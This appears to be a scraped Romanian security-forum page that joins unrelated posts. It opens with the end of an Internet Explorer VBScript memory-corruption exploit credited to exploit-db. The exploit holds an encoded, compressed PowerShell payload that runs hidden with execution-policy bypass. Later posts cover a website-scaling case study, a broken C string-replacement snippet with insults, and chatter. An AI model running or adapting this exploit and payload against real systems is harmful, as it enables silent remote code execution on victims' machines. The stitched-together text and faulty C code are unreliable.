payload="nVVdi9tGFH33rxiMHmzWWkYafTlmIWlDIVBCYZf2wfhhNBp1RWXJyHLqTZv/Xp1jXzfbvIS+zOed+3HOuVLg1IN6O59t37fth/2hH8bF/A8/dL418X3VtvPlTh1OZds4dRztOE3+PE736kM3/jIO6tdmGE+2fde2vVtcz/5cqVPTjep8nV+u8+fl5n/H+XHwdvRPz9NUSZzT1e+nlfo38nX1VezryX+j74+f3DB+T+y93x/9uPjW862q+dtZ0E9Avquq8Onl4FU4vSn98N7XTdeMTd+pwKnwo917Nf+t6Uw8V2E37Y4H67ziyU+nzsHyqMKDPR7H5+E0C84PQf/mzSuQ9UqfI60xmcuU6OVGbX94Gf12twuOYFSfSzvdlH4a0nIaqnoadIIVLlyF1XoacpzFGGoMKS5MBBPcllglsZylKYJjq82rbYFtjkApAhl4qfkC0YpSVjHs4mIaMgwWMTy8aHhxGOIMDnKY4FmSSwZJJsUweIwzywwAQoZVBWODojOcFTDJnJwlWEUImaDUAsYOrjTfOkGIzwxWDsVERA0mKbOiSSaQlE5KveCSSvYpb1lbJdmXpAu5WJpoiaFRVpRL4uQjIUwstbxFY/kwsYDTYlsjhkdZa+bCisj+WgAzRnJ2GGwsbGVWmPYwyZBLgUA1TNbEvhQCclwUMI5g5wrRCzN1pTAdZVJvokV6eSyuCCLR1dRfLtjTAcVAOC0c+FpqIy4+kVwuNFqhlgjVTgjInZCca8GgYBp4VuFF4UQ5OR0QXSNxHTmHcU2VYIi8SI89UxIrbD1u4/WtNmoSkBhkmhYiM4vBpcJ5iQvKu85EFvRiE8mAqbFXSRnB1kic3UN0CbZln99WFu7ZW449SEKtaCjLhWn2L+kmRwwUkW6qCTGo3UKLQBLYsY+ocSJOV57y5rckFm1UbNhYZMZ+uxBAV6mwcOkPwnnrvALD2kjlbGIWQyFlN6kwe4LNXiCDrJJvK0rUCKamlEDUGnEhySlQ44cxgtOMRaeSqXUiH34izVoqj9zqa53WVJi5VamFClYZ10xoM6v7QS2C5kFvgkaFrZ82R3f/s+9+H5/DaDmd3t0t1V/48F//PNvLr2e3CM73T/20MfFieRc0y5Wanm6DZrdS0VL9rfrTGHantt18mQWf+et49d+cEloF5xUm/DIeRzuM4WPr/UGFj971XaXwZ9H6Hw==" command="Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(""""" & chr(34) & payload & chr(34) & """"")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();" params="-NoP -NonI -Exec Bypass -Command " & command 'Original POC yuange 'set shell=createobject("Shell.Application") 'shell.ShellExecute "notepad.exe" 'With UAC 'shell.ShellExecute "powershell", params, "", "runas", 0 'Without UAC shell.ShellExecute "powershell", params, "", "", 0 end function </script> <SCRIPT LANGUAGE="VBScript"> dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end if end function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5) end function function Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then ' document.write(i) Create=True Exit For End If Next end function sub testaa() end sub function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end function function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end function function ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 ReadMemo=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0) end function </script> </body> </html> Sursa: http://www.exploit-db.com/exploits/35308/

Un exemplu de anul trecut. Cum firma Distinct "a avut grija" de Evomag. Bogdan Belu, CEO Distinct, a vorbit la Internet and Mobile World despre probleme si solutii de scalabilitate in cazuri de trafic ridicat. Prezentarea s-a numit "Studiu de caz: Cum a ajutat Distinct pe evoMAG.ro sa faca fata varfului de trafic Blackfriday 2013". Sumar: Scalarea website-ului tau pentru a accepta o crestere mare de clienti intr-o perioada scurta de timp este o incercare pentru toate partile implicate (administratori de retea, datacenter, dezvoltatori software, webmasteri). Aceasta prezentare este despre cum am scalat website-ul retailer-ului IT evoMAG.ro - electrocasnice si electrice online la cel mai bun pret in timpul evenimentului Blackfriday 2013 si care au fost probleme comune si solutiile identificate. Slides "Studiu de caz: Cum a ajutat Distinct pe evoMAG.ro sa faca fata varfului de trafic Blackfriday 2013" (PDF, English) Video aici: IMWORLD 2014 - Prezentare Bogdan Belu: Studiu de caz: Cum a ajutat Distinct pe evoMAG.ro sa faca fata varfului de trafic Blackfriday 2013

@MrGrj : - strstr - Parcurge sirul de caractere - strcpy - Parcurge sirul de caractere - strlen - Parcurge sirul de caractere Evita strlen (specificand dimensiunea) si strstr (procesand manual sirul). Muie em.

Citeste si intelege codu boss. Ai zis sa fie O(n).

#include <stdio.h> int main() { char sir_initial[] = "Ana are mere!"; char sir_inlocuire[] = "_spatiu_"; char sir_nou[1024] = {0}; size_t sir_lungime = 13; size_t sir_inloc_lungime = 8; int pos_nou = 0; int i = 0; int c = 0; while(sir_initial) { if(sir_initial == ' ') { int x = pos_nou; pos_nou = pos_nou + sir_inloc_lungime; while(sir_initial && sir_initial != ' ') sir_nou[pos_nou++] = sir_initial[i++]; strncpy(sir_nou + x, sir_inlocuire, sir_inloc_lungime); i++; } else sir_nou[pos_nou++] = sir_initial[i++]; printf("%s\n", sir_nou); } return 0; }

Poate dupa ce se termina conferinta se publica si inregistrarile prezentarilor (video) si prezentarile (pdf/pptx) pe site.

Duie MIICOT.